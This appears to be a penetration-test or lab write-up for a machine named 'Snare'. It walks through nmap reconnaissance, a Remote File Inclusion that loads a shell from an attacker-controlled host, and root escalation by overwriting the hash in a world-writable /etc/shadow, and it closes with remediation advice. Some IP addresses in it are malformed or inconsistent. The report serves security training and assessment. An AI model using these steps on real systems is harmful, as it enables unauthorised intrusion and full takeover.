Snare

Executive Summary

A penetration test was conducted on the target machine 10.115.0.150.18 (hostname: snare.ptd). The assessment revealed critical vulnerabilities, including Remote File Inclusion (RFI) leading to initial access and misconfigured file permissions on /etc/shadow, allowing privilege escalation to root.

Key Findings:

Remote File Inclusion (RFI) in index.php leading to code execution.
World-writable /etc/shadow allowing root privilege escalation.
Exposed sensitive credentials (password hash modification possible).

Risk Level:

Critical (Unauthenticated RCE + Privilege Escalation to root).

Methodology

Reconnaissance

Nmap Scan Result

nmap -sCV -p- --open --min-rate=1000 $IP -vv -o scvnmap.txt
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 2f:0e:73:d4:ae:73:14:7e:c5:1c:15:84:ef:45:a4:d1 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTwC6g2x1Xawbb8OgTWFp9xBwvovIW5Wzi+brOV9fgBvHZxZFu3YFO1dWmJkRVKnwULirMinwwKODQgp20Rn9ELAyoJpWZnfzJgs3Lj/P1XBAO7qXJCwVz5sdOA6Cm9fct/62d5UqSuu7MMBde58BDDhYYVF8gGlpuBgISidPmGEKLRhlkuKzUlWMU4O48MDDPEK/HVxaaKl1UJnA7B2ri9a9T/5Xrl2B1rQgSdo369Fy63QSBCb+8DfVxHHfr2KxHkCZsz+a/u8UDWt6hnCYhhFrT09zmSuEMZCCDonA+XxsuzXhxw2w8sMfsQunTp039lGPW5/l8GW/mEekL+ZvG0XwarHIck3zzgl3UW29rPI74l/2P9xsgmsDHhY7VrF3e89SWG4ZwbQwx4IE5BsXS+SyzR14NXVs2u5/9j+hYw4QKgQXZL5QQcawNelTUe85/z46t4iM8OE44OeUfiX6xySgFLP0lWoXb5fAqV/PnmSRgWD7Am/uA+7L7slNNpc0=
|   256 39:0b:0b:c9:86:c9:8e:b5:2b:0c:39:c7:63:ec:e2:10 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGmiszcF9/ODPO+E1DJqmOTFzU9x8my1YjSU0kQ/0wP4rWOM6n842lfVnetuBSK8atTyLQldVvOvDUC1dbmebXQ=
|   256 f6:bf:c5:03:5b:df:e5:e1:f4:da:ac:1e:b2:07:88:2f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILJhRxho5TB813oD6OcYI0wGuykFwNAdb+8DyOCwtjPY
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-title: Welcome to my homepage!
|_Requested resource was /index.php?page=home
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Open Ports:

22/tcp (SSH) – OpenSSH 8.2p1 (Ubuntu)
80/tcp (HTTP) – Apache 2.4.41 (Ubuntu)

Enumeration

Web Application Analysis:

URL structure: http://10.115.0.150.18/index.php?page=home

Suspected Local/Remote File Inclusion (LFI/RFI) vulnerability.

Exploitation

1. Remote File Inclusion (RFI) → RCE

At the first glance the url build like /index.php?page=home, this indicate potential Local File Inclusion or Remote File Inclusion.

http://10.150.150.18/index.php?page=http://mymachine:8088/my

Reverse Shell Obtained:

Gained access as www-data.

Stabilized shell:

/usr/bin/script -qc /bin/bash /dev/null
export TERM=xterm-256color

Privilege Escalation (Root via `/etc/shadow` Modification)

Manual enumaration find that, /etc/shadow can be edit by global user. With the persmission, we can change root hash with crafted one. I will use mkpasswd with password smallcurl.

Discovery:

/etc/shadow had world-writable permissions:

ls -la /etc/shadow
-rwxrwxrwx 1 root shadow 1129 Nov 20  2020 /etc/shadow

Exploitation:

Generated a new root password hash (smallcurl):

mkpasswd -m sha-512 smallcurl

Replaced root’s hash in /etc/shadow.

Logged in as root via SSH or change user (su)

ssh root@10.115.0.150.1

www-data@snare:/tmp$ ls -la /etc/shadow
ls -la /etc/shadow
-rwxrwxrwx 1 root shadow 1129 Nov 20  2020 /etc/shadow

## Attacker Machine 
mkpasswd -m sha-512 smallcurl  
$6$ltYEddtO8FzflSsa$UvLAmFfRm6oH7GUEMcK2Vxi2kLWb1yhOETJgA1Iu22hmbBSCkkK87NmHYj1tUmaSQqdcG7JZsIslKmiC13gU60

Findings & Vulnerabilities

1. Remote File Inclusion (RFI)

Risk: Critical
Description: The page parameter in index.php allows arbitrary file inclusion, leading to remote code execution (RCE).

Proof of Concept (PoC):

http://10.115.0.150.18/index.php?page=http://<ATTACKER_IP>/shell.php

Impact:
- Unauthenticated attackers can execute arbitrary commands as www-data.

2. World-Writable `/etc/shadow`

Risk: Critical
Description: The /etc/shadow file had 777 permissions, allowing any user to modify passwords.
Impact:
- Any low-privileged user can escalate to root by replacing the root hash.

Recommendations

Remote File Inclusion (RFI)

Sanitize user input in index.php.
Use a whitelist approach for file inclusion.
Disable remote URL inclusion in PHP (allow_url_include=Off).

`/etc/shadow` Permission Misconfiguration

Restrict /etc/shadow permissions:

chmod 640 /etc/shadow
chown root:shadow /etc/shadow

Audit system-critical files for incorrect permissions.

Conclusion

The target machine was fully compromised due to Remote File Inclusion (RFI) and misconfigured /etc/shadow permissions. Immediate remediation is required to prevent unauthorized root access.

Next Steps:

Patch the RFI vulnerability.
Correct /etc/shadow permissions.
Conduct a full system audit for similar misconfigurations.

Report Author: whymir Date: 28/3/2025

Last updated 8 months ago